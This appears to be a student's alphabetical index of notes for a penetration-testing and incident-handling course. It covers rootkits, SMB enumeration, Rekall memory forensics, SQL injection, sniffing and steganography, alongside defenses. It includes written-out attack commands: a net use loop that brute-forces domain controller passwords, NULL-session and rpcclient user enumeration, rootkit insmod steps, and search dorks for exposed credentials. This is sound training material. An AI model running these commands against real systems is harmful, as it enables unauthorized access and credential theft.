Proxy Firewalls  2  Sender makes a connection to the proxy
  Proxy makes a separate connection to the receiver
  Packets are not forwarded through the device
  Packet header information is annihilated
psexec  4  52  Metasploit psexec module supports pass the hash
  --Powerful module for SMB infiltration
pslist  5  23  Lists running processes (PID, name and Parent ID)
pstree  5  23  See a full process tree for a memory image
Ptunnel  5  119  Tunnels TCP through ICMP
  MD5-based challenge/response auth between client and proxy
  Currently, no encryption between client and proxy
Ptunnel: Features  5  120  Consists of two components: the Ptunnel client and the Ptunnel proxy. The attacker configures the Ptunnel client to listen on a given TCP port on the localhost interface of the client machine. In addition, the attacker must configure the Ptunnel proxy, which runs on an external machine accessible via ping packets from the Ptunnel client
Pulsing Zombies  4  159  Zombie machines that are only active for short periods
  --Launch attack, then go dormant
  -Rotates between groups of zombies
push  3  149  Means to throw the register onto the stack
Pushpin  2  31  Slurps social media in a geographic area.
  Social media geolocation
  --Flickr
  --Twitter
  --Picasa
Pushpin: Output  2  32  see screenshot
Qualys  2  116  Commercial service; offers its features as a Web-based scanning service
QUIC  5  127  Quick UDP Internet Connection
  Use of multiplexed UDP connections for connections
Ransomware  2  10  Bad guy takes over a system and somehow blackmails the victim.
Recon: Web Based  2  50  Shodan, DNSStuff, tracert, traceroute, network-tools, securityspace
  -All are able to research target sites, provide info about network/vulns
Recon: Search Engine  2  35  The easiest way to get information is to ask for it.
Reconnaissance  2  16  Two general types of attackers
  --Script kiddies: Look for low-hanging fruit, and may skip this step
  --Attackers out to get a particular site: This step is extremely important
  DNS registration provides a wealth of open source info about a target
  --Used for social eng, war driving, scanning, etc.
  Can also use a whois lookup to find out allocated IP blocks (18)
  Search the target's websites for clues about their software/hardware, etc.
  --Also look for information that can help social eng. (29)
Recon-ng  2  43  -Ties together numerous different recon sources into one framework
  -Currently more than 60 different recon modules
  -Most modules are free, some require a third-party API key
  -Some modules can tell if any target organization has been compromised via third-party sites
  -Uses the web interface for many sites to scrape results
  Determined attackers use these tools to gain access to target environments without even using an exploit
Red Pill  4  78  The Red Pill looks for a shifted Interrupt Descriptor Table
  --Helps ID the presence of a VM
Reflected DDoS Attacks  4  158  Using the TCP three-way handshake, an attacker can bounce a flood from the zombie to the victim
  Zombie sends a SYN to legitimate site
  Legit site sends a SYN/ACK to flood the victim
  Makes tracing the attack even more difficult
Registration Attack - DNS  3  88  Make a similar-looking domain name
Rekall  5  23-27  Rekall consists of numerous modules, each of which scours a Windows memory dump looking for specific artifacts
Rekall Modules  5  23  Rekall modules include:
  imageinfo: Shows the date and time the memory dump was captured
  netstat: Lists open sockets (PID, port, protocol, and when it was opened)
  pstree: See a full process tree for a memory image
  pslist: Lists running processes (PID, name, and Parent PID)
  dlllist: Lists the DLLs loaded by a process, as well as the command-line invocation of a process
  netscan: Shows all listening UDP and TCP ports and connections
  filescan: Lists the files that each process had open
  pedump: Dumps code associated with running process into executable file
  modules: Lists loaded modules from the dump, including drivers and SYS files
Rekall: DLLs and Command Line  5  27  Use Rekall's dlllist module to display a list of DLLs loaded by a process, as well as the command-line invocation of a running process:
  [1] memimage.dd hh:mm:ss> dlllist pid=[pid_num]
  Output is similar to the following commands on a live Windows machine:
  C:\> tasklist /m /fi "pid eq [pid]"
  C:\> wmic process where processid=[pid] get commandline
Rekall: Viewing Network Connections  5  25  Using Rekall's netstat module, we can display a list of active network connections at the time the memory dump was acquired:
  [1] memimage.dd hh:mm:ss> netstat
  Output is similar to the following command on a live Windows machine:
  C:\> netstat -nao | find "ESTABLISHED"
Rekall: Viewing Processes  5  26  Rekall's pslist module displays a list of running processes at the time the image was acquired:
  [1] memimage.dd hh:mm:ss> pslist
  Output is similar to the following command on a live Windows machine:
  C:\> wmic process get name, parentprocessid, processid
Removing Malicious Software (Eradication)  1  118  Remove malware inserted by the attacker
  -Viruses, worms, backdoors, etc.
  Rootkits require a complete wipe/rebuild
  **Sometimes vulnerable services were the entry point. Look to patch or remove services
Remux  2  100  Scanning through multiple open proxies online
Report (Lessons Learned)  1  127  The goal of the Lessons Learned phase is to document what happened and improve our capabilities
  Develop a follow-up report immediately after recovery
  Assign the task to the on-site team
  Include incident forms and bring in all involved parties to review the draft
  Attempt to reach consensus and get sign-off; if someone doesn't agree, have them submit and sign off on their own version of the event
Responder  3  71  Tool designed to launch LLMNR attacks (dedicated to answering stray LLMNR/NBT-NS/Proxy requests).
  Can also be launched against NBT-NS, DNS/MDNS
  Automatically launches a number of services to redirect victim systems to in order to harvest credentials
  --HTTP, HTTPS, SQL Server, Kerberos, FTP, IMAP, SMTP, DNS, LDAP
  Goal is to spoof a system, then be ready to intercept authentications on the fly.
  Can also serve up malicious .exe files and force a downgrade to LANMAN authentication
Responder: Capture  3  73  See screenshots
Responder: Starting  3  72  See screenshots
Restore Operations (Recovery)  1  123  Decide when to restore operations. Try for an off-hours timeslot; it's easier to monitor carefully. Put the final decision in the hands of the system owners. Provide your advice, but they make the final call. Document your advice in a signed memo.
Restoring from Backups (Eradication)  1  117  Can be difficult to locate a clean backup; sometimes infections predate backup media
  ---In many cases (rootkits especially), you will need to wipe/rebuild
  **Always use original media to reinstall, patch after
Reverse HTTP Shells  5  117  1.) The internal system surfs the Internet asking for commands from the attacker's external machine.
  2.) The attacker types in commands at the external machine on the Internet and sends the commands back to the victim machine as HTTP responses.
  3.) These commands are then executed on the internal network host.
  4.) The results are pushed out with the next web request.
  Works through web proxies
  --Uses HTTP GET command
  --Even supports authenticating through a web proxy with a static password!
Reverse-path forwarding  3  Router checks each incoming packet against its routing tables to see if the packet's source address is coming from an interface that the router would normally use to route packets to that destination
RIPEMD-160  2  13  File integrity checker
robots.txt  2  44  Website file that instructs search bots to exclude info from the archive
Rootkits - User-Mode Defenses (Integrity)  5  60  Cryptographic hashes of key system files stored in a safe place
  -Tripwire, OSSEC, nCircle, Solidcore, AIDE
  --The Internet Storm Center has a free NSRL lookup tool
Rootkits - User-Mode Hiding  5  50  There are four categories of hiding tools: Process hiding, Network hiding, File hiding, and Event hiding
  --Processes are modified to not display attacker's actions
Rootkits: User-Mode Defenses  5  59  -Don't let attacker get root in the first place
  -Harden and patch the system thoroughly
  **Analysis of /bin/login by automated tool to look for embedded password
  -Use rootkit detectors (not always accurate)
  --Use equivalent commands and compare results
Rootkit Hiding: In Action  5  54  When a rootkit runs on the victim machine, the rootkit executable first makes a copy of itself in the system32 directory. Then, in steps 1 and 2, it creates two other files in the same directory: iexplore.dll and explorer.dll, files that you might assume are associated with the legitimate programs. In step 3 the rootkit executable injects explorer.dll into running processes named "explorer.exe".
Rootkit Hiding: Windows  5  53, 55  Newer rootkits make hiding easy
  No configuration necessary
  The attacker just loads it on the end system in a directory of the attacker's choosing, and then runs it (typically with admin privileges).
  --All artifacts associated with a rootkit directory are automatically hidden
Rootkit Platforms  5  48
Rootkit: Avatar  5  68  See: Avatar Rootkit
Rootkit: Fontanini  5  69  Hides processes, connections, logged-in users, and gives UID 0 privileges
  Uses file system function hooking
  Replaces file inodes to redirect read functions to evil inodes
  --For example, netstat reads data from /proc/net/tcp
  Simply replaces the inode read call to filter certain evil results
  Works on Linux 3.0 and greater kernels
  Install with the following commands:
  --# make
  --# insmod rootkit.ko
Rootkit: Kernel-Mode Defenses - (Configuration Lockdown)  5  70  Don't allow attackers admin rights
  Harden the box, patch, etc.
  Use a good security template
  The Center for Internet Security (CIS), in conjunction with NSA, NIST, and others, has developed a set of templates for Win, Lin, Solaris, HP-UX, Cisco Routers, and Oracle DBs
  They have scoring tools as well
Rootkit: Kernel-Mode Defenses (Integrity)  5  73  Look for changes in critical system files
  Tripwire, OSSEC, Ionx Data Sentinel
Rootkit: Kernel-Mode Detectors (Win)  5  72  Sophos Anti-Rootkit
  McAfee Rootkit Detective
  Rootkit Revealer
Rootkit: Kernel-Mode Defenses: Contain, Erad, Recov  5  75  The containment, eradication, and recovery steps for kernel-mode rootkit techniques involve the same techniques used for user-mode rootkits
  --Containment
  ----Analyze other systems' changes made by discovered rootkits
  --Eradication
  ----Wipe drive, then reformat drive
  ----Reinstall OS, applications, and data
  ----Make sure to apply all patches
  ----Change all admin/root passwords on victim and related systems
  --Recovery
  ----Monitor system very carefully
Rootkit: Linux/Unix Detection Tools  5  71  Look for inconsistencies b/w system apps
  Run a rootkit checker: Chkrootkit, RootkitHunter, OSSEC
  FALSE POSITIVE POSSIBLE!!!
Rootkits  5  47  A collection of tools that allow an attacker to:
  --Keep backdoor access into a system (maintain access)
  --Mask the fact the system is compromised
  Accomplished by altering the operating system itself
  **Either modify OS or modify the kernel
Rootkits: Altering Kernel in Memory  5  62  /dev/kmem holds a map of kernel memory on Linux
  --Windows (System Memory Map)
  --Super User Control Kit (SUCKit) (Linux), FU (Windows)
  --Difficult due to randomness of memory; can crash system
Rootkits: Changing Kernel File on the Hard Drive  5  63  Instead of altering live kernel memory, attackers could overwrite the kernel file on the hard drive
  On Linux, the file is vmlinuz
  On Windows, kernel functionality is in the ntoskrnl.exe and win32k.sys files
  -Attacker must foil NTLDR integrity checks of these files
  -Bolzano and FunLove viruses did this in 1999
Rootkits: Kernel-Mode  5  56-64  Rather than modify every system application, these modify the kernel
  --More thorough than creating malicious versions of all system apps
  --Better control over system
  --Requires in-depth understanding of kernel; is specific to the kernel
  *Alters system call table to tell user programs how to respond to calls
Rootkits: Loadable Kernel Modules and Device Drivers  5  61  Linux kernel is designed to be expanded through loadable kernel modules
  Windows kernel uses device drivers
  Insert code into the kernel
  Can augment kernel capabilities
  Can overwrite existing kernel functionality
  Win 7 and later require mandatory device driver signing (started with Windows Vista and included in all newer Windows versions)
  --Could steal signing keys (Stuxnet)
  --Or, use Method 2, altering kernel memory
Rootkits: User-Mode Linux  5  49  The login, rshd, sshd, inetd, and tcpd services are modified
  --Attacker is given remote access to any of these services
Rootkits: User-Mode Windows  5  54-58  Debug privileges allow DLL injection
  --Hook APIs that present views of running processes, open ports, and the file system
Rootkits: Virtualization  5  64  Attacker can put legit-looking system in a virtual machine
  Put whole OS in a virtual machine
  Victim users are locked in a jail but they don't know it
  SubVirt, Blue Pill
  Hardware-based rootkit called Vitriol for Intel VT-x technology
Rootkits: Where and What to Inject  5  52  Inject code that hooks API calls to hide the attacker on the system
  --Masks various running processes, files, registry keys, and network activity
Rooty  5  66  Works on 2.6+ and 3.0+ Linux kernels, 32- and 64-bit support
  Uses driver support/loadable kernel modules
  -Uses insmod to insert the various rootkit components
  Modifies the System Call Table
  --Real-time hiding from strace, lsmod
RPC scanning  2  94  Identifies which Remote Procedure Call services are offered by the target machine.
rpcclient  2  142  $ rpcclient -U [username] [WinIPaddr]  (establish a session)
  You have an rpcclient prompt with many commands available
  -enumdomusers: List users
  -enumalsgroups [domain]|[builtin]: List groups (stands for "enum alias groups")
  -lsaenumsid: Show all users' SIDs defined on the box
  -lookupnames [name]: Show SID associated with user or group name
  -lookupsids [sid]: Show user name associated with SID
  -srvinfo: Show OS type and version
  The rpcclient man page lists hundreds of other commands
  -Those listed here are the most useful and a lab covers them shortly
Rubber Duckie  3  5  Human interface device; looks like a mass storage device (thumbdrive), but is really an automatic keyboard.
SAINT  2  116  Commercial vulnerability scanner
Salt  4  20  A salt is a random number used to seed the crypto algorithm
Santy  2  42  Worm that uses Google searches to find vulnerable systems to spread to
sc (service control)  2  103  To disable a service permanently, type
  sc config [service] start= disabled
Scanning  2  52  War Driving, War Dialing, and Network Scanning
Scanning - Network Mapping  2  79-86  An attacker wants to understand the topology of the target network
  The layout of routers and hosts can show vulnerabilities
  Nmap can be used for network mapping and port scanning
Scanning - Port Scanning  2  87-104
Scanning - Vuln Scan  2  123  Test against a list of known exploits
Scareware  5  16  Scaring people into believing their systems are compromised
  -They sometimes charge hundreds of dollars to "fix" a system
  -Usually just clear the event logs
Scoopy  4  78  Looks for shifted Interrupt, Local, and Global Descriptor Tables
ScreenShotter  3  54  MITMf tool that invokes HTML5 Canvas to take a screenshot of the browser
SCTP  5  127  Stream Control Transmission Protocol (SCTP)
Search Engine Recon: Automated Search Engine  2  43  Bishop Fox's SearchDiggity is a fantastic suite that includes Google Diggity, Bing Diggity, and other search capabilities
  -Malware Diggity, Data Loss Prevention Diggity, Flash Diggity
  -Many of these "diggity" components require an API for the respective service
  -Sometimes, free APIs provide fewer results than the web interface
  Recon-ng is another powerful automated search tool
Search Engine Recon: Defense  2  44  Limit what is accessible
  --Use meta tags to limit web features that are visible to web bots
  --robots.txt provides a list of files/dirs for search robots to ignore
  --Remove individual pages ("NOINDEX, NOFOLLOW" meta tag)
  --Remove snippets ("NOSNIPPET" meta tag)
  --Remove cached pages ("NOARCHIVE" meta tag)
  --Remove an image from Google Image Search
  Remove unwanted items from Google
  --Fill out request form
  --Make specific change to page
Keywords Book Page Remarks

Search for specific file types on a target domain


Look for active content: .asp, .jsp, .php, or .cgi
Excel spreadsheets: Search for .xls and view it as HTML…
Search Engine Recon: - Spreadsheet image comes from Google cache
2 40
File Types .ppt can also be useful
For example, search for
- site:www.[target].com asp
"filetype:" is useful, but also try just the suffix
"filetype:" is the same as "ext:"

Search on "cache:www.google.com"
Brings up the cached version of the page
Search Engine Recon:
Google's Cache and 2 39 Browse the Google cache
Wayback
The Wayback Machine is a thorough view, with multiple images over time

Search Engine Recon: Search Directives 2 37 "site:"
--searches only within the given domain
--site:www.google.com
"link:"
--shows all sites linked to a given site
--link:www.google.com
"intitle:"
--shows pages whose title matches the search criteria
"inurl:"
--shows pages whose URL matches the search criteria
"related:"
--shows similar pages (sometimes useful, sometimes not)
"info:"
--finds cached page, related pages, pages that link to it, pages that contain the term (NOT USEFUL)

Search Engine Recon: Search Tips and Types 2 38 Surround literals with " ", as in "Soc Sec Num"
Add minus (-) to a search term to maximize effectiveness of resulting hits
--Excludes pages with a given word
----For example, search on: site:sans.org
Search for airline status
--Type in airline and flight number
--Front end to Travelocity
Search for VIN for vehicle information
Search for UPC number for product info
Search Engine Recon: Vulnerable Systems 2 42 We can perform various searches associated with commonly exploited systems
- Available remote desktop systems: ext:rdp rdp
- Default web material (Apache, IIS, ColdFusion, and others)
- Web-based FileMaker Pro databases: "Select a database view"
- Indexable directories: intitle:index.of "parent directory"
- User IDs and passwords (look for "password" and "userid")
- Shell history (look for common shell names and commands)
- Video cameras (example: search for inurl:"ViewerFrame?Mode=")
FOCA has the ability to identify many of these vulnerabilities

Session Hijacking 3 67 Session hijacking synthesizes sniffing and spoofing
Option 1: Steal session at origination or destination (ttysnoop, ttyspy)
Option 2: Steal sessions across network (ettercap)
Session Hijacking - Defenses: Containment, Erad, and Rec 3 77 Containment
-Drop suspicious sessions
-Carefully analyze destination systems when session was hijacked
Erad, Rec
---At a minimum change passwords, rebuild systems

Session Hijacking - Defenses: Identification 3 76 -Users dropping sessions
-Incorrect ARP entries
To check from local machine
- On Windows, type c:\> arp -a
- On UNIX type $ arp -a or arp -e depending on your UNIX flavor
To check across the network (ARPWatch)
To look at DNS cache on Windows client, type c:\> ipconfig /displaydns
-Error messages from SSH clients
-Drop suspicious sessions
-Carefully analyze destination systems when session was hijacked
---change passwords, rebuild systems

Session Tracking 4 136 When a user initiates a session with a web server for an online application, many applications request a userID and password to authenticate the user.
URL tracking, hidden form elements, cookies
--used to track sessions, HTTP is stateless
Session tracking tools: Tamper Data, Firebug, Add-n-Edit cookies

Set-NetAdapter 2 72 Windows PowerShell cmdlet used to change MAC address


Sexually Explicit Websites (Unauthorized Use) 1 169 - It could be a factor in a sexual-harassment case
- It could embarrass your organization
- These sites sometimes distribute spyware and other forms of malicious code
**keep a close eye on company FTP servers, etc.
sha1sum 2 13 built-in Linux integrity tool
ShellShock 4 91 See first paragraph
Shodan 2 51 Provides details about a target via banner-grabbing.
-Can ID services/products run on a target machine
SilentEye 5 144 Embeds encrypted data and other files into JPEG, BMP, and WAVE formats
SL4NT 5 121 reference
S-Mail 5 143 Hides data in exe and dll files
Smashing the stack 3 103 If the data size is not checked, the RP can be overwritten by user data
Attacker exploit places machine code in the buffer and overwrites the RP
When function returns, attacker's code is executed

SMB Enumeration 2 136 enum -S [TargetIPaddr] pulls a list of shares (IPC$, ADMIN$, and C$)
enum -U pulls list of users
enum -G pulls groups and membership
enum -P pulls password policy information
Enum uses a NULL SMB session
Use -u [User Name] -p [Password] for authenticated session in Enum
SMB Protocol 2 134 SMB is a Layer 7 protocol that implements file and printer sharing
-also includes domain auth and remote admin
-Used by File Explorer, net use, sc, reg, psexec
Accessed via TCP port 445 or NetBIOS ports 135-139 (Win NT, Win2k)
C:\> net use see SMB sessions
SMB Session - Drop 2 143 C:\> net use \\[IP Addr] /del drop sessions
C:\> net session see who has an inbound session
C:\> net session \\[IPaddr] /del drop an inbound session

SMB Session - Windows 2 135 Windows uses the net use command to establish the session
--net use \\[Target IP]
Typically the admin share is selected (indicated by a $)
To connect as another user or to a specific share:
--net use \\[Target IP]\[Share Name] [password] /u:[username]
To connect as no user (an anonymous or NULL SMB Session):
--net use \\[Target IP] "" /u:""
SMB Sessions - First Three Commands 2 137 C:\> net view  Show shares and systems
C:\> net user /domain  Users
C:\> @FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && echo [*] %n %p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL  (crack passwords)

SMB Sessions (Evil) Defenses 2 144, 145 Verify in registry that you're blocking NULL SMB sessions (pg 151)
Block/limit vulnerable ports:
TCP/UDP 445 MS Server Message Block
TCP 135 RPC/DCE Endpoint mapper
UDP 137 NetBIOS Name Service
UDP 138 NetBIOS Datagram Service
TCP 139 NetBIOS Session Service
SMB Sessions from Linux to Windows via SMB Client 2 141 Use the smbclient tool:
$ smbclient -L [WinIPaddr] -U [username] -p 445  (enter password when prompted) To list available shares
$ smbclient //[WinIPaddr]/test -U [username] -p 445  (enter password when prompted) Pull files from SMB share

smbclient 2 141 Used to establish an SMB session from Linux to Windows
To list available shares:
smbclient -L [WinIPaddr] -U [username] -p 445
Enter the password when prompted
To connect to an SMB share and pull files interactively (behaving like an FTP client):
smbclient //[WinIPaddr]/test -U [username] -p 445
--Enter the password when prompted
--You get an "smb: \>" prompt
--Use ls for directory listing, cd to change directories, and get to get files
--Type ? for a list of additional commands

smbmount 4 52 Command reads the hashes from the environment variable named SMBHASH, overriding any passwords provided by the
attacker, using the hash for authentication to the target instead
Snare Agent and Log Server 5 121 reference

Snarfing Application Data 3 54 Once data is flowing through our proxy we can start harvesting various sensitive data
- User IDs, Passwords, Session Identifiers, URLs, etc.
We can invoke keystroke loggers within browsers
- MitMf has a module called Jskeylogger which allows us to grab keystrokes by injecting code into viewed webpages
MitMf also has a tool called ScreenShotter which invokes HTML5 Canvas to take a screenshot of the browser

Sniffers 3 45 Sniffers gather all information transmitted across a line
- For broadcast media (such as Ethernet or wireless network), sniffers allow an attacker to gather passwords and more
- For Ethernet, all data is broadcast on the LAN segment
- Switched Ethernet limits data to a specific destination physical port on a switch
- Switches perform switching by determining which MAC addresses are connected to which physical interface (by observing the source MAC address of Ethernet frames), storing this information in memory (called a CAM table)
-NOTE: To sniff in a switched environment, the attacker needs to redirect the flow of traffic on the LAN, either by attacking the switch itself or going after the machine sending the traffic
Sniffing and Session Hijacking Defenses 3 76 -Hard-code ARP tables on sensitive LANs
-Activate port-level security on your switches, sticky ports
-Use Dynamic ARP Inspection with DHCP Snooping
-Encrypt sessions and use strong authentication
-Don't Telnet to infrastructure components
Sniffing and Session Hijacking Defenses: Containment 3 77

Sniffing SSL and SSH 3 60 Step 1: Attacker runs the DNS spoofing program and a web or SSH proxy
Step 2: Victim tries to resolve a name using DNS
Step 3: The victim's browser establishes an SSL connection (with the web proxy process on the attacker's machine)
Step 4: The web proxy establishes its own SSL connection with the real destination web server
Step 5: The victim sees a message saying that the web server's cert isn't signed by a recognized Certificate Authority (CA). But, most users simply continue the session! As the user accesses the website all traffic appears on the attacker's machine
The same process applies for SSH
Essentially, web proxy and SSH proxy tools are used to exploit a trust model based on the user knowing what is okay and what is not
sniffit 3 72 allows the attacker to look at data; ettercap is better!

Software Distro Site: Defense 2 13 Check hashes across multiple mirrors
--Check multiple hash algorithms (SHA1, SHA256, MD5, etc.)
--md5sum and sha1sum are built into Linux
--Md5summer is available for free for Windows
--RIPEMD-160
Check PGP signatures if available
Don't put new software directly into production; test first
Solaris-Gratuitous ARP 3 49 Solaris avoids this problem by implementing a specific lifetime for ARP cache entries. Of course, on Solaris, you just have to wait for the ARP cache entry to time out, and then hit it with the poison entry
Sorting through a Bunch of Data (grep) 1 244 The grep command finds items that match a given condition
Source Routing 3 IP spoofing. Source routing is an option in IP that allows the source of a packet to specify the path it will take on the network
Split DNS 3 94 Use split-split DNS
One server resolves names for the internal net, one for externally accessed sites
Best solution, but complex/expensive
Spoofing IP - Defense 3 Preparation
1) Make Initial Sequence Numbers unpredictable
--Install patches for TCP/IP stacks as vendors release updates
2) Don't extend trust outside of firewall
3) Don't base authentication on IP; utilize passwords, crypto
4) Replace -r commands with stronger commands, such as SSH
5) Utilize anti-spoof filters at routers and firewalls
6) Don't allow source routed packets through network gateways

sptoolkit 1 20 sptoolkit is an excellent way to create phishing campaigns and track the results

SQL Injection 4 96 This technique tries to manipulate a backend database by going through the web application and trying to add information to a SQL statement. SQL is the Structured Query Language, a tool used to access most relational databases today.
**select [field] from [table] where [variable] = '[value]';
**update [table] set <variable> = '<value>';
SQL Injection 4 94-101 Most web apps use a SQL database
--if input is not scrubbed, user can append SQL syntax to queries
--error messages can be used to ID poor input validation
-Limit the permissions of the web app when accessing the database
-Consider using parameterized stored procedures
-On the server side, the app should filter user input
tools: Nmap, Zed Attack Proxy (ZAP), Burp, Sqlmap, Havij
ModSecurity offers solid filtering features for Apache, IIS, and Nginx

SQL Injection (Examples) 4 99-102 Finding errors, Dropping Data, Grabbing more Data, Getting Database Structure
SQL Injection: Vulnerabilities 4 97 Attackers first try to find some user-supplied input string in the web application. Attackers then start adding string quotation characters to the user data to see how the system reacts when the data is submitted

SQL Injection: Data Manipulation 4 98 After target user input string has been identified, use standard database logic elements and see what happens!
--Double dash (--): Comment delimiter
--Semicolon (;): Query terminator
--Asterisk (*): Wildcard selector
--Percent (%): Matches any substring
--Underscore (_): Matches any character
Other useful entities are OR, TRUE, 1=1, SELECT, JOIN, and UPDATE

SQL Injection: Defenses 4 103, 104 Preparation:
--Limit the permissions of the web app when accessing the database
----Won't eliminate SQL Injection but can limit damage
--Consider using parameterized stored procedures:
----Code splits up user input into parameters fed to stored proc in database
--On the server side, the app should filter user input, removing:
----Quotes of all kinds
----Minus signs (-), Semicolons (;), Asterisks (*), Percentages (%), Underscores (_)
----Other shell/scripting metacharacters (=&\|*?~<>()[]{}$\n\r)
--ModSecurity offers solid filtering features for Apache, IIS, and Nginx
--PHP PDO
Identification:
--Search web application logs for special characters or phrases such as union, select, join and inner
--DLP tools may detect exfiltration event for PII
----*Although encryption may hamper the ability to detect
Containment:
--Block source IP address and/or account being exploited
Eradication:
--Remove attacker data from the system
--Launch fraud investigation if required
SSH Sniffing 3 63 SSHmitm (SSH protocol version 1 only)
SSHmitm substitutes its public key for the SSH server's, setting up two SSH connections
sshmitm 3 63 Sniff SSH- DNSSpoof
SSID cloaking 2 60 APs configured not to include the SSID in beacons
SSL sniff 3 57 DNSSpoof webmitm
SSL Warning 3 61, 62 See screenshots
SSL Warnings Dodging 3 65, 66, 67 Vulnerability in some versions of Apache, which dumps system memory via malformed heartbeat requests
PowerBleed by Joff Thyer does this. See Methods for Dodging SSL Warnings

sslstrip / sslstrip+ 3 68 Rewrites all HTTPS URLs into HTTP URLs. To stop this many organizations have implemented HTTP Strict Transport Security (HSTS). Implemented in MitMf
Stack 3 102 The stack is LIFO (last in first out). You push things on top of the stack and pop things from the top of the stack
The return pointer (RP) contains the address of the calling function

Starting Rekall 5 24 See screenshot
$ source /home/tools/rekall/bin/activate
(rekall)$ rekal -f /home/tools/504_memory_ex/memimage.dd
Stash 5 143 Hides data in a variety of image formats
Stego 5 142 Can hide data in a variety of formats
-Images (BMP, GIF, JPEG)
-Word documents, Text documents, Machine-generated images
-Fractals, complex crowds of animals/flowers/people

Stego Tools 5 143 Jsteg- Hides in JPEG images using the DCT coefficients
MP3Stego- Hides in MPEG files
S-Mail- Hides data in exe and dll files
Invisible Secrets- Hides data in banner ads that appear on websites
Stash- Hides data in a variety of image formats
Hydan- Hides data in UNIX/Linux and Windows executables
Stego Tools (More) 5 144 OpenStego- Embeds data and digital watermarks into images
SilentEye- Embeds encrypted data and other files into JPEG, BMP and WAVE formats
OpenPuff- Great support for images, audio, video and flash-adobe files

Stego: Defenses 5 150, 151 Preparation:
--Get familiar with stego tools
--Look at changes to critical web server files (file integrity-checking tools)
Identification:
--If you have the original source image, detection is easy
----*Perform a diff or file comparison and see whether they are different
----*MD5 or SHA-1 hashes can help
----Stego might not change the size or make any observable changes, but it does change the data
--If you are working on an HR or legal case, take direction from your legal team
Containment:
--Work with law enforcement and HR
Erad, Recov:
--Work with your company's legal team

Stego: Detection 5 149 StegExpose: Java utility to detect stego in lossless images where Least Significant Bit (LSB) techniques are used
--This stego is where the LSBs which determine color are modified
--This leads to a very slight (think imperceptible) change of color made to the original image
Supports a number of different "detectors" or mathematical analysis techniques to detect stego
For quick analysis, it can also use "cheap" or quick analysis methods to detect the presence of stego
Has the ability to run on a large number of files very quickly
StegExpose 5 149 StegExpose: Java utility to detect stego in lossless images where Least Significant Bit (LSB) techniques are used
Supports a variety of mathematical analysis techniques for detection
--can also use "cheap" methods to detect the presence of stego quickly
Subroutines 3 101 SEE SLIDE - Buffer Overflows
Subterfuge 3 64 Outstanding MITM tool, similar to the Dsniff suite, in an easy web interface
--advanced credential harvester that supports SSL Strip
--module for hijacking sessions and HTTP manipulation, like Ettercap
--module that supports blocking VPN tunnels

SYN scans 2 94 Only send the initial SYN and await the SYN-ACK response to determine if a port is open. The final ACK packet from the attacker is never sent. The result is an increase in performance and a much stealthier scan. Because most host systems do not log a connection unless it completes the three-way handshake, the scan is less likely to be detected.
SYS_execve 5 59 used by the kernel/OS to execute programs
SYSKEY 4 31 Extra layer of encryption for the SAM Database
System Center Config Manager (SCCM) (Enterprise-Wide IR) 1 138 SCCM is a one-stop shop for a wealth of IR data.
--reports on installed software, drivers, users, services

System-Level Detection 1 57 View Diagram
Tamper Data 4 137 Free Firefox plug-in for manipulating numerous aspects of HTTP Requests
Taranis 3 48 Taranis can bombard a switch with a flood, just like Macof. Taranis sends Ethernet frames with the victim's MAC address to trick the switch into thinking the victim's MAC address is on two ports
TCP and UDP ports 2 90 Port scanners send packets to various ports to determine whats listening
TCP Header 2 92 view slide
TCP Ports 2 90 65,536 ports. TCP port 80 (web server), TCP port 445 (Windows Server Message Block), TCP 6000 indicates an X Window Server
TCP sequence prediction 2 94 Useful in spoofing attacks, as we shall see in a short while

TCP Three-way Handshake 2 91 Initial SYN establishes sequence number for A to B. Usually, B must remember this, allocating state in its connection queue. Response SYN-ACK establishes sequence number for B to A
SYN: Synchronize
ACK: Acknowledgment
FIN: End of connection
RESET: Tear down a connection
URG: Urgent data is included
PUSH: Data should be pushed through the TCP stack
tcpkill 3 50 - Kills existing TCP connections
- Sends spoofed RESETs to both sides
- Forces user or application to reauthenticate
- Attacker can then grab or participate in session authentication
tcpnice 3 50 - Active traffic shaping: Inject packets with smaller TCP window sizes or ICMP source quench
- Useful if sniffing a fast connection and you need to slow down the rate of packet flow for a given connection
TCPview 2 102 For a GUI view of port usage use TCPview
Terminator 3 128 Type of Canary
Traceroute 2 84 Traceroute sends packets with small TTL (Time to Live) values
IPv4 TTL and IPv6 Hop Limit is the number of hops the packet should go before being discarded
Based on the source address of the TTL-exceeded message, you can determine the router for a given hop
The scanning system increments TTL for each packet to determine each router hop
Trade Secrets 1 180 Protect sensitive info required for your business for which you have taken reasonable precautions to secure
Trademarks, Service Marks 1 180 Protect brands, whether icons, phrases, or sounds
Tripwire 5 73 File Integrity Checker
Looks for registry modifications
Trojan 5 6 A Trojan Horse hides malicious activity in legit software

Tunneling and Covert Channels 5 115 You can carry any protocol on top of any other protocol
First protocol is encapsulated inside packets for second protocol
--Network sees only second protocol
Example:
--X Windows over SSH
--IP inside IP
--IP over CP (the Avian Transport Protocol)
----RFCs 1149 and 2549
Tunnels - ICMP 5 119 Numerous tools carry data inside the payloads of ICMP packets
-ptunnel (TCP over ICMP Echo and Reply), Loki (Linux Shell), ICMP Shell (Linux), PingChat (Windows chat program), ICMPCmd (Windows cmd.exe access)
UDP Header 2 93 view slide
UDP Ports 2 90 65,536 ports. UDP port 53 (DNS server). Each open port offers a potential way into a system.
UDP scanning 2 94 Helps locate vulnerable UDP services. For most UDP ports, Nmap sends packets with an empty payload. But, for a dozen specific ports, Nmap includes an application-appropriate payload for the given port, including UDP port 53 (DNS), 111 (portmapper), 161 (SNMP), etc.
UID 0 root level.
Unauthorized Use 1 164 Authorized access, but used inappropriately
- E-Mail problems
- Inappropriate web surfing (sexually explicit, e.g.)

UNIX Password Cracking: Defenses (John the Ripper) 4 40 Guard the password file!
--Carefully protect backups
--Physically protect system build media
Enforce strong passwords:
--(PAM)
Use shadow passwords
Use crypto-based and token-based authentication
UNIX Password File Format 4 36 /etc/passwd has one line per account with colon-separated fields. The fields are Login name: Encrypted password: UID Number: Default GID: GECOS Info: Home Directory: Login shell

UNIX Shadow File Format 4 37 /etc/shadow is readable only with superuser privileges (UID 0). The fields are Login name: encrypted password: Date_of_last_pw_change: Min_pw_age_in_days: Max_pw_age_in_days: Advance_days_to_warn_user_of_pw_age

Unpacking Windows Executables: Defenses 5 20 To counter packers, use unpackers or debugger plugins
Immunity Debugger - Very popular free Windows debugger
--OllyDbg (Windows) has dozens of unpacking scripts
www.openrce.org
